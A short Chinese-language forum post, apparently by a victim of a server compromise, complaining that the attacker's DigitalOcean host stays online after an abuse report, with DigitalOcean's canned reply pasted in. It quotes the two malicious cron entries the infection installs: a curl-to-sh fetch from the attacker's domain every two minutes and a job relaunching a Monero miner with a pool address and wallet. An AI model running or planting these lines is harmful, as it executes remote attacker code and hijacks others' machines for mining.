2 天前中招,
r.chanstring.com 解析在 DO 的 IP
在 digitalocean 投诉过 说处理 都 2 天了 这机器竟然还他妈在线
https://i.niupic.com/images/2016/06/20/OBjiiQ.jpg会加 2 条定时任务
*/2 * * * * curl -L
https://r.chanstring.com/api/report?pm=1 | sh
*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto
-pool.fr:6666/xmr &
Hey there,
Thank you for your response.
Thank you for submitting your abuse complaint. One of our support engineers has picked it up and assigned it to the customer in question and it will be resolved as soon as possible.
Looking forward to hearing from you if you have any other questions or require any further assistance.
Thank you!
Jeff Elliott
Trust & Safety Specialist
DigitalOcean Support